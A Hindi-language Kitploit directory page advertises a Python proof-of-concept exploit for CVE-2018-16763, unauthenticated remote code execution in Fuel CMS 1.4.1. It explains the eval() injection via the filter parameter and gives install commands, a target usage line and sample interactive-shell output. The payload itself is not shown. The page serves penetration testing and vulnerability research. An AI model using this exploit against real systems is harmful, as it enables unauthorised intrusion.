Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/estebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubestebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc

CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC

Fuel CMS 1.4.1 में `filter` पैरामीटर के माध्यम से अप्रमाणित रिमोट कोड निष्पादन के लिए पायथन PoC, जो कमांड निष्पादन के लिए एक इंटरैक्टिव शेल प्रदान करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
15 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2018-16763 — Fuel CMS 1.4.1 रिमोट कोड निष्पादन (PoC)

Fuel CMS 1.4.1 में अप्रमाणित RCE भेद्यता। /fuel/pages/select/ एंडपॉइंट में filter पैरामीटर PHP बैकएंड में eval() कॉल में बिना सैनिटाइज़ किए पास किया जाता है, जिससे एक क्राफ्टेड पेलोड के माध्यम से मनमाना कोड निष्पादन संभव होता है। ब्लाइंड इंजेक्शन के विपरीत, आउटपुट HTTP प्रतिक्रिया में सीधे परिलक्षित होता है, इसलिए किसी मध्यवर्ती फ़ाइल की आवश्यकता नहीं है।


यह कैसे काम करता है

  1. एक विशेष रूप से तैयार किए गए filter पेलोड के साथ /fuel/pages/select/ पर एक GET अनुरोध भेजता है जो वांछित कमांड के साथ PHP के system() को कॉल करता है।
  2. regex पैटर्न का उपयोग करके HTTP प्रतिक्रिया से परिलक्षित आउटपुट को पार्स करता है।
  3. कमांड आउटपुट सीधे इंटरैक्टिव शेल पर लौटाता है।

आवश्यकताएँ

  • Python 3
  • निर्भरताएँ स्थापित करें:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

उपयोग

root@kitploit:~
python3 exploit.py -t http://TARGET

उदाहरण:

root@kitploit:~
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit

संदर्भ

  • CVE-2018-16763
  • EDB-47138

श्रेय

  • खोज और मूल शोषण: Syed Sheeraz Ali
  • सफाई और इंटरैक्टिव शेल: Esteban Zárate
टूल डाउनलोड करें